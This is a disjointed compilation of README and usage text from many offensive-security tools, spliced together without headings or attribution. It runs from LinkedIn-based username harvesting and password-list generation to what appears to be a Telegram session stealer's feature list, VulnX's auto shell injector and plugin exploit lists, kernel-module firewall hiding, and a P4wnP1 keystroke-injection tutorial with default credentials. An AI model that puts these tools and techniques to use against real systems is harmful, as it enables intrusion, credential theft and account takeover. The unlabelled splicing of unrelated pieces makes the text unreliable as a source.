git clone https://github.com/m8r0wn/crosslinked
cd crosslinked
pip3 install -r requirements.txt

python3 crosslinked.py -f '{first}.{last}@domain.com' company_name

python3 crosslinked.py -f 'domain\{f}{last}' -t 45 -j 0.5 company_name

  -h, --help    show this help message and exit
  -t TIMEOUT    Timeout [seconds] for search threads (Default: 25)
  -j JITTER     Jitter for scraping evasion (Default: 0)
  -o OUTFILE    Change name of output file (default: names.txt
  -f NFORMAT    Format names, ex: 'domain\{f}{last}', '{first}.{last}@domain.com'
  -s, --safe    Only parse names with company in title (Reduces false positives)
  -v            Show names and titles recovered after enumeration

• pwd_gen.py - Generates custom password lists using words and variables defined at the top of the script. Perform number/letter substitutions, append special characters, and more. Once configured, run the script with no arguments to generate a 'passwords.txt' output file.
  
• user_gen.py - Generates custom usernames using inputs from firstname.txt and lastname.txt files, provided at the command line. Format is defined similiar to crosslinked.py and will be written to 'users.txt'.
  

python3 user_gen.py -first top100_firstnames.txt -last top100_lastnames.txt -f "domain\{f}{last}"

• Bypass new security mechanisms
  
• Bypass Two-step verification!
  
• Bypass Inherent identity and need 5-digit verification code!
  
• Support SMTP Transport
  
• Support Telegram API Transport (With Proxy)
  
• Support FakeMessage
  
• Support Custom Icons
  
• Bypass A.V (Comming soon...)
  
• NOTE: Only official telegram desktops currently supported
  

• Detect cms (wordpress, joomla, prestashop, drupal, opencart, magento, lokomedia)
• Target informations gatherings
• Target Subdomains gathering
• Multi-threading on demand
• Checks for vulnerabilites
• Auto shell injector
• Exploit dork searcher

• Com Jce
• Com Jwallpapers
• Com Jdownloads
• Com Weblinks
• Com Fabrik
• Com Jdownloads Index
• Com Foxcontact
• Com Blog
• Com Users
• Com Ads Manager
• Com Sexycontactform
• Com Media
• Mod_simplefileupload
• Com Facileforms

• Simple Ads Manager
• InBoundio Marketing
• WPshop eCommerce
• Synoptic
• Showbiz Pro
• Job Manager
• Formcraft
• PowerZoom
• Download Manager
• CherryFramework
• Catpro
• Blaze SlideShow
• Wysija-Newsletters

• Add Admin
• Drupal BruteForcer
• Drupal Geddon2

• attributewizardpro
• columnadverts
• soopamobile
• pk_flexmenu
• pk_vertflexmenu
• nvn_export_orders
• megamenu
• tdpsthemeoptionpanel
• psmodthemeoptionpanel
• masseditproduct
• blocktestimonial
• soopabanners
• Vtermslideshow
• simpleslideshow
• productpageadverts
• homepageadvertise
• homepageadvertise2
• jro_homepageadvertise
• advancedslider
• cartabandonmentpro
• cartabandonmentproOld
• videostab
• wg24themeadministration
• fieldvmegamenu
• wdoptionpanel

• Opencart BruteForce

usage: vulnx [options]

  -u --url              url target to scan
  -D --dorks            search webs with dorks
  -o --output           specify output directory
  -t --timeout          http requests timeout
  -c --cms-info         search cms info[themes,plugins,user,version..]
  -e --exploit          searching vulnerability& run exploits
  -w --web-info         web informations gathering
  -d --domain-info      subdomains informations gathering
  -l, --dork-list       list names of dorks exploits
  --threads             number of threads

$ git clone https://github.com/anouarbensaad/VulnX.git
$ cd VulnX
$ docker build -t vulnx ./docker/
$ docker run -it --name vulnx vulnx:latest -u http://exemple.com

$ docker run -it --name vulnx -v "$PWD/logs:/VulnX/logs" vulnx:latest -u http://exemple.com

$ git clone https://github.com/anouarbensaad/VulnX.git
$ cd VulnX
$ chmod + x install.sh
$ ./install.sh

• Supports Single IP Address, asn, ranges, firewall as Input
• Supports Bulk
• Exports Results to Screen or to An Output File
• Supports IPv4 and IPv6
• Supports ASN number , RANGES , Firewall

• PHP >= 7.0
• JSON PHP Extension
• CURL PHP Extension
• official PHP library for IPfinder.

composer global require ipfinder-io/ip-finder-cli

• macOS: $HOME/.composer/vendor/bin
• GNU / Linux Distributions: $HOME/.config/composer/vendor/bin
• Windows: %USERPROFILE%\AppData\Roaming\Composer\vendor\bin

## using curl
$ curl -LO https://github.com/ipfinder-io/ip-finder-cli/releases/download/v1.0.0/ipfinder.phar
## using wget
$ wget https://github.com/ipfinder-io/ip-finder-cli/releases/download/v1.0.0/ipfinder.phar 
$ chmod +x ipfinder.phar
$ sudo mv ipfinder.phar /usr/bin/ipfinder
$ ipfinder -h

1. Download IPFINDER PHAR from github
2. Create a directory for PHP binaries; e.g., C:\bin
3. Open a command line (e.g., press Windows+R» type cmd» ENTER)
4. Create a wrapping batch script (results in C:\bin\ipfinder.cmd):

C:\Users\username> cd C:\bin
C:\bin> echo @php "%~dp0ipfinder.phar" %* > ipfinder.cmd
C:\bin> exit

5. Open a new command line and confirm that you can execute IPfinder from any path:

C:\Users\username> ipfinder --help

uname -r

git clone https://github.com/CoolerVoid/HiddenWall

cd HiddenWall/module_generator

$ cat rules/server.yaml
module_name: SandWall
public_ports: 80,443,53
unhide_key: AbraKadabra
hide_key: Shazam
fake_device_name: usb14
liberate_in_2_out: True
whitelist: 
- machine: 
   ip: 192.168.100.181
   open_ports: 22,21
- machine:
   ip: 192.168.100.22
   open_ports: 22

$ python3 WallGen.py --template template/hiddenwall.c -r rules/server.yaml

# cd output; make clean; make
# insmod SandWall.ko

# echo "AbraKadabra" > /dev/usb14
# lsmod | grep SandWall
# rmmod SandWall

git clone --recurse-submodules https://github.com/hc0d3r/sshd-poison
cd sshd-poison
make

A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: WordPress, Joomla, Drupal etc.

- Version 1.1.2 [19-05-2019]
- Version 1.1.1 [01-02-2019]
- Version 1.1.0 [28-08-2018]
- Version 1.0.9 [21-08-2018]
- Version 1.0.8 [14-08-2018]
- Version 1.0.7 [07-08-2018]
...

• Basic CMS Detection of over 170 CMS
• Drupal version detection
• Advanced Wordpress Scans
  • Detects Version
  • User Enumeration
  • Plugins Enumeration
  • Theme Enumeration
  • Detects Users (3 Detection Methods)
  • Looks for Version Vulnerabilities and much more!
• Advanced Joomla Scans
  • Version detection
  • Backup files finder
  • Admin page finder
  • Core vulnerability detection
  • Directory listing check
  • Config leak detection
  • Various other checks
• Modular bruteforce system
  • Use pre made bruteforce modules or create your own and integrate with it

• git clone https://github.com/Tuhinshubhra/CMSeeK
• cd CMSeeK
• pip/pip3 install -r requirements.txt

• python3 cmseek.py

• python3 cmseek.py -u <target_url> [...]

USAGE:
       python3 cmseek.py (for guided scanning) OR
       python3 cmseek.py [OPTIONS] <Target Specification>

SPECIFING TARGET:
      -u URL, --url URL            Target Url
      -l LIST, --list LIST         Path of the file containing list of sites
                                   for multi-site scan (comma separated)

MANIPULATING SCAN:
      -i cms, --ignore--cms cms    Specify which CMS IDs to skip in order to
                                   avoid flase positive. separated by comma ","

      --strict-cms cms             Checks target against a list of provided
                                   CMS IDs. separated by comma ","

      --skip-scanned               Skips target if it's CMS was previously detected.

RE-DIRECT:
      --follow-redirect            Follows all/any redirect(s)
      --no-redirect                Skips all redirects and tests the input target(s)

USER AGENT:
      -r, --random-agent           Use a random user agent
      --googlebot                  Use Google bot user agent
      --user-agent USER_AGENT      Specify a custom user agent

OUTPUT:
      -v, --verbose                Increase output verbosity

VERSION & UPDATING:
      --update                     Update CMSeeK (Requires git)
      --version                    Show CMSeeK version and exit

HELP & MISCELLANEOUS:
      -h, --help                   Show this help message and exit
      --clear-result               Delete all the scan result

EXAMPLE USAGE:
      python3 cmseek.py -u example.com                           # Scan example.com
      python3 cmseek.py -l /home/user/target.txt                 # Scan the sites specified in target.txt (comma separated)
      python3 cmseek.py -u example.com --user-agent Mozilla 5.0  # Scan example.com using custom user-Agent Mozilla is    5.0 used here
      python3 cmseek.py -u example.com --random-agent            # Scan example.com using a random user-Agent
      python3 cmseek.py -v -u example.com                        # enabling verbose output while scanning example.com

• HTTP Headers
• Generator meta tag
• Page source code
• robots.txt

 cmsID = {
   'name':'Name Of CMS',
   'url':'Official URL of the CMS',
   'vd':'Version Detection (0 for no, 1 for yes)',
   'deeps':'Deep Scan (0 for no 1 for yes)'
 }

1. Add a comment exactly like this # <Name Of The CMS> Bruteforce module. This will help CMSeeK to know the name of the CMS using regex
   
2. Add another comment ### cmseekbruteforcemodule, this will help CMSeeK to know it is a module
   
3. Copy and paste the module in the brutecms directory under CMSeeK's directory
   
4. Open CMSeeK and Rebuild Cache using R as the input in the first menu.
   
5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK.

 Main Menu

Scan Result

 

WordPress Scan Result

• Target
• Exact copy of error or screenshot of error
• Your operating system and python version

• Fast and portable - install hyper and run.
• Multiconnection scanning.
• Multithreaded connections.
• Scalable: scans can be as docile or aggressive as you configure them to be.
• h2 and h2c support.
• Configurable directory recursion depth.

usage: h2buster.py [-h] -w wordlist -u target [-r directory_depth]
                   [-c connections] [-t threads]

h2buster: an HTTP/2 web directory brute-force scanner.

arguments:
  -h, --help          show this help message and exit
  -w wordlist         Directory wordlist
  -u target           Target URL/IP address. Default port is 443 and HTTPS
                      enabled. To specify otherwise, use ':port' or 'http://'
                      (port will default to 80 then).
  -r directory_depth  Maximum recursive directory depth. Minimum is 1, default
                      is 2, unlimited is 0.
  -c connections      Number of HTTP/2 connections. Default is 3.
  -t threads          Number of threads per connection. Default is 15.

sniffglue enp0s25

pacman -S sniffglue

cargo install sniffglue

• ethernet
• ipv4
• ipv6
• arp
• tcp
• udp
• icmp
• http
• tls
• dns
• dhcp
• cjdns eth beacons
• ssdp
• dropbox beacons
• 802.11

docker build -t sniffglue .
docker run -it --init --rm --net=host sniffglue eth0

cargo run --example boxxy

• -time - needed because the crates.io cert expires in the future
• -domain_host - requires root for unshare(2) and has been excluded

ci/reprotest.sh

cargo fuzz run read_packet

• USB functions:
  • USB Ethernet (RNDIS and CDC ECM)
  • USB Serial
  • USB Mass Storage (Flashdrive or CD-Rom)
  • HID Keyboard
  • HID Mouse
• runtime reconfiguration of USB stack (no reboot)
• detection of connect/disconnect makes it possible to keep P4wnP1 A.L.O.A powered up (external supply) and trigger action if the emulated USB device is attached to a new host
• no need to deal with different internal ethernet interfaces, as CDC ECM and RNDIS are connected to a virtual bridge
• persistent store and load of configuration templates for USB settings

• replacement for limited DuckyScript
• sophisticated scripting language to automate keyboard and mouse
• up to 8 HIDScript jobs could run in parallel (keep a job up to jiggle the mouse, while others are started on-demand to do arbitrary mouse and keystroke injection seamlessly)
• HIDScript is based on JavaScript, with common libraries available, which allows more complex scripts (function calls, using Math for mouse calculations etc.)
• keyboard
  • based on UTF-8, so there's no limitation to ASCII characters
  • could react on feedback from the hosts real keyboard by reading back LED state changes of NUMLOCK, CAPSLOCK and SCROLLLOCK (if the target OS shares LED state across all connected keyboards, which isn't the case for OSX)
  • take branching decisions in HIDScript, based on LED feedback
• mouse
  • relative movement (fast, but not precise)
  • stepped relative movement (slower, but accurate ... moves mouse in 1 DPI steps)
  • absolute positioning on Windows (pixel perfect if target's screen dimensions are known)
• Keyboard and mouse are not only controlled by the same scripting language, both could be used in the same script. This allows combining them in order to achieve goals, which couldn't be achieved using only keyboard or mouse.
• current language layouts: br, de, es, fr, gb, it, ru and us

• full interface to Bluez stack (currently no support for remote device discovery/connect)
• allows to run a Bluetooth Network Access Point (NAP)
• customizable Pairing (PIN based legacy mode or SSP)
• High Speed support (uses 802.11 frames to achieve WiFi like transfer rates)
• Runtime reconfiguration of the Bluetooth stack
• Note: PANU is possible, too, but currently not supported (no remote device connection)
• persistent store and load of configuration templates for Bluetooth settings

• modified Firmware (build with Nexmon framework)
  • allows KARMA (spoof valid answers for Access Points probed by remote devices and allow association)
  • broadcast additional Beacons, to emulate multiple SSIDs
  • WiFi covert channel
  • Note: Nexmon legacy monitor mode is included, but not supported by P4wnP1. Monitor mode is still buggy and likely to crash the firmware if the configuration changes.
• easy Access Point configuration
• easy Station mode configuration (connect to existing AP)
• failover mode (if it is not possible to connect to the target Access Point, bring up an own Access Point)
• runtime reconfiguration of WiFi stack
• persistent store and load of configuration templates for WiFi settings

• easy ethernet interface configuration for
  • bluetooth NAP interface
  • USB interface (if RNDIS/CDC ECM is enabled)
  • WiFi interface
• supports dedicated DHCP server per interface
• support for DHCP client mode
• manual configuration
• persistent store and load of configuration templates for each interface

• all features mentioned so far, could be configured using a CLI client
• the P4wnP1 core service is a single binary, running as systemd unit which preserves runtime state
• the CLI client interfaces with this service via RPC (gRPC to be specific) to change the state of the core
• as the CLI uses a RPC approach, it could be used for remote configuration, too
• if P4wnP1 is accessed via SSH, the CLI client is there, waiting for your commands (or your tab completion kung fu)
• the CLI is written in Go (as most of the code) and thus compiles for most major platforms and architectures

1. compile the client for windows
2. make sure you could connect to P4wnP1 somehow (Bluetooth, WiFi, USB)
3. add the host parameter to your client commands
4. ... and use the CLI as you would do with local access.

• should work on most major mobile and desktop browsers, with consistent look and feel (Quasar Framework)
• uses gRPC via websockets (no RESTful API, no XHR, nearly same approach as CLI)
• Thanks to this interface, the weblient does not rely on a request&reply scheme only, but receives "push events" from the P4wnP1 core. This means:
  • if you (or a script) changes the state of P4wnP1 A.L.O.A. these changes will be immediately reflected into the webclient
  • if you have multiple webclients running, changes of the core's state will be reflected from one client to all other clients
• includes a HIDScript editor, with
  • syntax highlighting
  • auto-complete (CTRL+SPACE)
  • persistent storage & load for HIDScripts
  • on-demand execution of HIDScript directly from the browser
  • a HIDScript job manager (cancel running jobs, inspect job state and results)
• includes an overview and editor for TriggerActions
• full templating support for all features described so far
• the WebClient is a Single Page Application, once loaded everything runs client side, only gRPC request are exchanged

• easy to use and understand
• usable from a webclient
• be generic and flexible, at the same time
• everything doable with the old "bash script" approach, should still be possible
• able to access all subsystems (USB, WiFi, Bluetooth, Ethernet Interfaces, HIDScript ... )
• modular, with reusable parts
• ability to support (simple) logical tasks without writing additional code
• allow physical computing, by utilizing of the GPIO ports

• The USB sub system is configured to emulate at least a keyboard
• There is a way to access P4wnP1 (remotely), in order to initiate the keystroke injection

• the USB settings are initialized to provide keyboard, mouse and ethernet over USB (both, RNDIS and CDC ECM)
• P4wnP1 could already be accessed remotely, using one of the following methods:
  • WiFi
    • the Access Point name should be obvious
    • the password is MaMe82-P4wnP1
    • the IP of P4wnP1 is 172.24.0.1
  • USB Ethernet
    • the IP of P4wnP1 is 172.16.0.1
  • Bluetooth
    • device name P4wnP1
    • PIN 1337
    • the IP is 172.26.0.1
    • Note: Secure Simple Pairing is OFF in order to force PIN Pairing. This again means, high speed mode is turned off, too. So the bluetooth connection is very slow, which is less of a problem for SSH access, but requesting the webclient could take up to 10 minutes (in contrast to some seconds with high speed enabled).
• a SSH server is accessible from all the aforementioned IPs
• The SSH user for KALI Linux is root, the default password is toor
• The webclient could be reached over all three connections on port 8000 via HTTP

1. You have attached P4wnP1 to some target host via USB (the innermost of the Raspberry's micro USB ports is the one to use)
2. The USB host runs an application, which is able to receive the keystrokes and has the current keyboard input focus (f.e. a text editor)
3. You are remotely connected to P4wnP1 via SSH (the best way is WiFi), preferably the SSH connection is running from a different host, then the the one which has P4wnP1 A.L.O.A. attached over USB

root@kali:~# P4wnP1_cli 
The CLI client tool could be used to configure P4wnP1 A.L.O.A.
from the command line. The tool relies on RPC so it could be used 
remotely.

Version: v0.1.0-alpha1

Usage:
  P4wnP1_cli [command]

Available Commands:
  db          Database backup and restore
  evt         Receive P4wnP1 service events
  help        Help about any command
  hid         Use keyboard or mouse functionality
  led         Set or Get LED state of P4wnP1
  net         Configure Network settings of ethernet interfaces (including USB ethernet if enabled)
  system      system commands
  template    Deploy and list templates
  trigger     Fire a group send action or wait for a group receive trigger
  usb         USB gadget settings
  wifi        Configure WiFi (spawn Access Point or join WiFi networks)

Flags:
  -h, --help          help for P4wnP1_cli
      --host string   The h   ost with the listening P4wnP1 RPC server (default "localhost")
      --port string   The port on which the P4wnP1 RPC server is listening (default "50051")

Use "P4wnP1_cli [command] --help" for more information about a command.

root@kali:~# P4wnP1_cli hid run -h
Run script provided from standard input, commandline parameter or by path to script file on P4wnP1

Usage:
  P4wnP1_cli hid run [flags]

Flags:
  -c, --commands string      HIDScript commands to run, given as string
  -h, --help                 help for run
  -r, --server-path string   Load HIDScript from given path on P4wnP1 server
  -t, --timeout uint32       Interrupt HIDScript after this timeout (seconds)

Global Flags:
      --host string   The host with the listening P4wnP1 RPC server (default "localhost")
      --port string   The port on which the P4wnP1 RPC server is listening (default "50051")

TempFile created: /tmp/HIDscript295065725
Start appending to 'HIDscript295065725' in folder 'TMP'
Result:
null

P4wnP1_cli hid run -c 'type("line 1\nline 2\nline 3 followed by pressing RETURN three times\n\n\n")'

P4wnP1_cli hid run -c 'press("CTRL ALT DELETE")'

P4wnP1_cli hid run -c 'press("A")'

P4wnP1_cli hid run -c 'press("SHIFT A")'

P4wnP1_cli hid run -c 'type("before caps\n"); press("CAPS"); type("after caps\n"); press("CAPS");'

• a keyboard report can contain up to 8 modifier keys at once
• the modifier keys are
  • LEFT_CTRL
  • RIGHT_CTRL
  • LEFT_ALT
  • RIGHT_ALT
  • LEFT_SHIFT
  • RIGHT_SHIFT
  • LEFT_GUI
  • RIGHT_GUI
• P4wnP1 allows using aliases for common modifiers
  • CTRL == CONTROL == LEFT_CTRL
  • ALT == LEFT_ALT
  • SHIFT == LEFT_SHIFT
  • WIN == GUI == LEFT_GUI
• in addition to the modifiers, press consumes up to six normal or special keys
  • normal keys represent characters and special keys
  • example of special keys: BACKSPACE, ENTER (== RETURN), F1 .. F12)
  • the keys are language layout agnostic (press("Z") results in USB_KEY_Z fo EN_US keyboard layout, but produces USB_KEY_Y for a German layout. This corresponds to pressing the hardware key 'Z' on a German keyboard, which would produce a USB_KEY_Y, too.)
  • /usr/local/P4wnP1/keymaps/common.json holds a formatted JSON keymap with all possible keys (be careful not to change the file)
• adding multiple keys to the a single press command, doesn't produce a key sequence. All given given keys are pressed at the same time and release at the same time.
• press releases keys automatically, this means a sequence like "hold ALT, press TAB, press TAB, release ALT" currently isn't possible

P4wnP1_cli hid run -c 'layout("us"); type("Typing with EN_US layout\n");layout("de"); type("Typing with German layout supporting special chars üäö\n");'

Tzping with EN?US lazout
Typing with German layout supporting special chars üäö

Typing with EN_US layout
Tzping with German lazout supporting special chars [';

P4wnP1_cli hid run -c 'typingSpeed(100,0); type("Hello world")'

P4wnP1_cli hid run -c 'typingSpeed(0,500); type("Writing with random jitter up to 500 milliseconds")'

P4wnP1_cli hid run -c 'typingSpeed(100,150); type("Writing with more natural speed")'

P4wnP1_cli hid run -c 'waitLED(NUM); type("A huge amount of characters\n")'

P4wnP1_cli hid run -c 'while (true) {waitLED(ANY);type("Attached\n");}'

1. waitLED could be used as initial command in scripts, to start typing as soon as the keyboard driver is ready
2. waitLED isn't the perfect choice, to pause HID scripts until a LED changing key is pressed on the USB host, as preserved state changes could unblock the command in an unintended way
3. Providing more complex HIDScript as parameter to the CLI isn't very convenient

• abort the P4wnP1 CLI with CTRL+C (in case the looping HIDScript is still running)
• open a browser on the host yor have been using for the SSH connection to P4wnP1 (not the USB host)
• the webclient could be accessed via the same IP as the SSH server, the port is 8000 (for WiFi http://172.24.0.1:8000)
• navigate to the "HIDScript" tab in the now opened webclient
• from there you could load and store HIDScripts (we don't do this for now, although ms_snake.js is a very good example for the power of LED based triggers)

return waitLED(ANY);

{"ERROR":false,"ERRORTEXT":"","TIMEOUT":false,"NUM":true,"CAPS":false,"SCROLL":false,"COMPOSE":false,"KANA":false}

{
 ERROR:  false, // gets true if an error occurred (f.e. HIDScript was aborted, before waitLED could return)  
 ERRORTEXT:  "",  // corresponding error string
 TIMEOUT: false, // gets true if waitLED timed out (more on this in a minute)
 NUM:  true,   // gets true if NUM LED had changed before waitLED returned
 CAPS:  false,  // gets true if CAPS LED had changed before waitLED returned
 SCROLL:  false,  // gets true if SCROLL LED had changed before waitLED returned
 COMPOSE: false,  // gets true if COMPOSE LED had changed before waitLED returned (uncommon)
 KANA:  false   // gets true if KANA LED had changed before waitLED returned (uncommon)
}

while (true) {
 result = waitLED(ANY);
 if (result.NUM) {
   type("NUM has been toggled\n");
 }
 if (result.SCROLL) {
   type("SCROLL has been toggled\n");
 }
 if (result.CAPS) {
   break; //exit loop
 }
}

• ANY (react on a change to any of the LEDs)
• ANY_OR_NONE (react on every new LED state, even if there's no change)
• NUM (ignore all LED changes, except on the NUM LED)
• CAPS (ignore all LED changes, except on the NUM CAPS)
• SCROLL (ignore all LED changes, except on the NUM SCROLL)
• multiple filters could be combined like this CAPS | NUM, NUM | SCROLL

waitLED(NUM,5000)

return waitLEDRepeat(ANY)

filter = ANY;  // same filters as for waitLED
num_changes = 5; // how often the SAME LED has to change, in order to return from waitLEDRepeat
max_delay = 800; // the maximum duration between two LED changes, which should be taken into acccount (milliseconds)
timeout = 10000;    // timeout in milliseconds

waitLEDRepeat(filter, num_changes, max_delay);    //wait till a LED frequently changed 5 times, no timeout
waitLEDRepeat(filter, num_changes, max_delay, timeout); //wait till a LED frequently changed 5 times, abort after 10 seconds

• we could start actions like keystroke injection from the CLI client, on-demand
• we could use the webclient to achieve the same, while having additional control over HIDScript jobs
• if we connect an external power supply to P4wnP1 A.L.O.A., we attach/detach to/from different USB hosts and already started HIDScripts go on working seamlessly
• we could configure the USB stack exactly to our needs (and change its configuration at runtime, without rebooting P4wnP1)
• we could write multi purpose HIDScripts, with complex logic based on JavaScript (with support for functions, loops, branching etc. etc.)

• The new goal is to type "Hello world" into the editor of a Windows USB host (notepad.exe).
• The editor should be opened by P4wnP1 (not manually by the user).
• The editor should automatically be closed, when any of the keyboard LEDs of the USB host is toggled.
• Everytime P4wnP1 is attached to the USB host, this behavior should repeat (with external power supply, no reboot of P4wnP1)
• The process should only run once, unless P4wnP1 is re-attached to the USB host, even if successive keyboard LED changes occur after the HIDScript has been started.
• Even if P4wnP1 is rebooted, the same behavior should be recoverable without recreating detail of the setup from scratch, again.

// Starting notepad
press("WIN R");         // Windows key + R, to open run dialog
delay(500);             // wait 500ms for the dialog to open
type("notepad.exe\n");  // type 'notepad.exe' to the run dialog, append a RETURN press
delay(2000);            // wait 2 seconds for notepad to come up

// Type the message
type("Hello world")     // Type "Hello world" to notepad

// close notepad after LED change
waitLED(ANY);           // wait for a single LED change
press("ALT F4");        // ALT+F4 shortcut to close notepad

//as we changed content, there will be a confirmation dialog before notepad exits
delay(500);             // wait for the confirmation dialog
press("RIGHT");         // move focus to next button (don't save) with RIGHT ARROW
press("SPACEBAR");      // confirm dialog with space

P4wnP1_cli hid run tutorial1.js

P4wnP1_cli.exe --host 172.24.0.1 hid run tutorial1.js

while (true) {
  waitLED(ANY_OR_NONE);     // wait till keyboard driver sends the initial LED state

  // Starting notepad
  press("WIN R");           // Windows key + R, to open run dialog
  delay(500);               // wait 500ms for the dialog to open
  type("notepad.exe\n");    // type 'notepad.exe' to the run dialog, append a RETURN press
  delay(2000);              // wait 2 seconds for notepad to come up

  // Type the message
  type("Hello world")       // Type "Hello world" to notepad

  // close notepad after LED change
  waitLED(ANY);       // wait for a single LED change
  press("ALT F4");          // ALT+F4 shortcut to close notepad

  //as we changed content, there will be a confirmation dialog before notepad exits
  delay(500);               // wait for the confirmation dialog
  press("RIGHT");           // move focus to next button (don't save) with RIGHT ARROW
  press("SPACEBAR")   ;        // confirm dialog with space 
}

// Starting notepad
press("WIN R");         // Windows key + R, to open run dialog
delay(500);             // wait 500ms for the dialog to open
type("notepad.exe\n");  // type 'notepad.exe' to the run dialog, append a RETURN press
... snip ...

waitLED(ANY_OR_NONE);   //assure keyboard driver is ready

// Starting notepad
press("WIN R");         // Windows key + R, to open run dialog
delay(500);             // wait 500ms for the dialog to open
type("notepad.exe\n");  // type 'notepad.exe' to the run dialog, append a RETURN press
delay(2000);            // wait 2 seconds for notepad to come up

// Type the message
type("Hello world")     // Type "Hello world" to notepad

// close notepad after LED change
waitLEDRepeat(ANY);     // wait for a single LED change
press("ALT F4");        // ALT+F4 shortcut to close notepad

//as we changed content, there will be a confirmation dialog before notepad exits
delay(500);             // wait for the confirmation dialog
press("RIGHT");         // move focus to next button (don't save) with RIGHT ARROW
press("SPACEBAR");      // confirm dialog with space

• "load & replace" clears all active trigger actions and loads only the stored ones
• "load & add" keeps the already active TriggerActions and adds in the stored ones. Thus "load & add" could be used to build a complex TriggerAction set out of smaller sets. The resulting set could then, again, be stored.

root@kali:~# P4wnP1_cli template deploy -h
Deploy given gadget settings

Usage:
  P4wnP1_cli template deploy [flags]

Flags:
  -b, --bluetooth string         Deploy Bluetooth template
  -f, --full string              Deploy full settings template
  -h, --help                     help for deploy
  -n, --network string           Deploy network settings template
  -t, --trigger-actions string   Deploy trigger action template
  -u, --usb string               Deploy USB settings template
  -w, --wifi string              Deploy WiFi settings templates

Global Flags:
      --host string   The host with the listening P4wnP1 RPC server (default "localhost")
      --port string   The port on which the P4wnP1 RPC server is listening (default "50051")

P4wnP1_cli template deploy -t tutorial1

• we typed "Hello world" into the editor of a Windows USB host
• the editor is opened by P4wnP1, not manually by the user
• the editor is closed automatically, when one of the keyboard LEDs toggled once
• every time P4wnP1 is attached to a USB host, this behavior repeats
• the HIDScript runs only once, unless P4wnP1 is re-attached to the USB host, even if successive keyboard LED changes occur
• if P4wnP1 is rebooted, the same behavior could be recovered by loading the stored TriggerAction set (which again refers to the stored HIDScript). This could either be achieved with a single CLI command or with a simple "load&add" or "load&replace" from the webclient's trigger action tab.

• it should be assured, that the USB configuration has the keyboard functionality enabled (the current setup doesn't do this and the TriggerAction couldn't start the HIDScript in case the USB keyboard is disabled)
• the created setup should applied at boot of P4wnP1 A.L.O.A., without the need of manually loading of the TriggerAction set. The setup has to survive a reboot of P4wnP1.

• device serial number: 123456789
• device product name: Auto Writer
• device manufacturer: The Creator
• Product ID: 0x9876
• Vendor ID: 0x1D6B
• enabled USB functions
  • HID keyboard
  • HID mouse

root@kali:~# P4wnP1_cli usb set -h
set USB Gadget settings

Usage:
  P4wnP1_cli usb set [flags]

Flags:
  -e, --cdc-ecm               Use the CDC ECM gadget function
  -n, --disable               If this flag is set, the gadget stays inactive after deployment (not bound to UDC)
  -h, --help                  help for set
  -k, --hid-keyboard          Use the HID KEYBOARD gadget function
  -m, --hid-mouse             Use the HID MOUSE gadget function
  -g, --hid-raw               Use the HID RAW gadget function
  -f, --manufacturer string   Manufacturer string (default "MaMe82")
  -p, --pid string            Product ID (format '0x1347') (default "0x1347")
  -o, --product string        Product name string (default "P4wnP1 by MaMe82")
  -r, --rndis                 Use the RNDIS gadget function
  -s, --serial                Use the SERIAL gadget function
  -x, --sn string             Serial number (alpha nu   meric) (default "deadbeef1337")
  -u, --ums                   Use the USB Mass Storage gadget function
      --ums-cdrom             If this flag is set, UMS emulates a CD-Rom instead of a flashdrive (ignored, if UMS disabled)
      --ums-file string       Path to the image or block device backing UMS (ignored, if UMS disabled)
  -v, --vid string            Vendor ID (format '0x1d6b') (default "0x1d6b")

Global Flags:
      --host string   The host with the listening P4wnP1 RPC server (default "localhost")
      --json          Output results as JSON if applicable
      --port string   The port on which the P4wnP1 RPC server is listening (default "50051")

root@kali:~# P4wnP1_cli usb set \
> --sn 123456789 \
> --product "Auto Writer" \
> --manufacturer "The Creator" \
> --pid "0x9876" \
> --vid "0x1d6b" \
> --hid-keyboard \
> --hid-mouse
Successfully deployed USB gadget settings
Enabled:      true
Product:      Auto Writer
Manufacturer: The Creator
Serialnumber: 123456789
PID:          0x9876
VID:          0x1d6b

Functions:
    RNDIS:        false
    CDC ECM:      false
    Serial:       false
    HID Mouse:    true
    HID Keyboard: true
    HID Generic:  false
    Mass Storage: false

• changing the settings from the webclient is easier and more convenient
• the webclient holds an internal settings state, this allows defining USB settings without actually deploying them (the CLI on the other hand, could only manipulate settings by deploying them. This, again, resets the while USB stack of P4wnP1 and all dependent functionality. F.e. already running HIDScript would be interrupted or USB network interfaces are redeployed
• the current settings of the webclient could be stored to a persistent template, without deploying them upfront
• the CLI client, (currently) isn't able to store USB settings

1. a template for the TriggerAction set, named tutorial1
2. a template for the USB settings, also name tutorial1

P4wnP1_cli template deploy --usb tutorial1 --trigger-actions tutorial1

• a already stored TriggerAction set template
• a already stored USB settings template
• a already stored WiFi settings template
• a already stored Bluetooth settings template
• multiple stored Network settings templates (one per each adapter)

1. Navigate to the "Generic Settings" tab of the webclient
2. On the "Master Template Editor" click on the small button on the right to the "TriggerActions Template" field
3. From the Dialog choose the tutorial1 template and confirm with "OK" button
4. If you selected the wrong template, re-open the dialog and select a different one or use the "x" icon on the right to "TriggerAction Template" to delete the current selection
5. Repeat the steps for the "USB Template" selection, again choose tutorial1 (which is a different template for the USB sub system, although it shares the name with the one for the TriggerActions)
6. Check that the correct templates have been selected for bot, USB and TriggerActions, and all other Templates are left empty
7. Store the new Master Template, by hitting the "Store" button and providing the name tutorial1

1. Deploying it using the "Deploy Stored" dialog from the "Master Template Editor" (as done with the startup Master Template a minute, ago)
2. Deploying it using the CLI client with P4wnP1_cli template deploy --full tutorial1 (the --full flag is an alias for Master Template)

• the Master Template tutorial1 loads USB settings, called tutorial1 which have
  • USB keyboard and USB mouse enabled
• the Master Template tutorial1 loads a TriggerAction set with a single TriggerAction
  • the TriggerAction starts the HID script tutorial1.js each time P4wnP1 gets attached to an USB host
    • the HIDScript starts typing, once the waitLED trigger fires (keyboard driver ready) and ends after a successive LED change

1. From the "Master Template Editor" hit the "Load Stored" button and reload the tutorial1 template to the editor.
2. The template should have tutorial1 set for "TriggerActions Template" and for "USB template"
3. For "WiFi Template" select the template named startup
4. For "Bluetooth Template" select the template named startup
5. For "Network Templates" select the templates named:
   1. bteth_startup
   2. usbeth_startup
   3. wlan0_startup_dhcp_server
6. Overwrite the tutorial1 Master Template with the new settings (hit "Store", enter tutorial1 and confirm with "OK")
7. Double check that the changes have applied, by hitting "Load Stored", again, and selecting tutorial1. All subsections of the loaded Master Template should look like described here.

root@kali:/usr/local/P4wnP1/legacy# ./karmatool.py 
Firmware in use seems to be KARMA capable
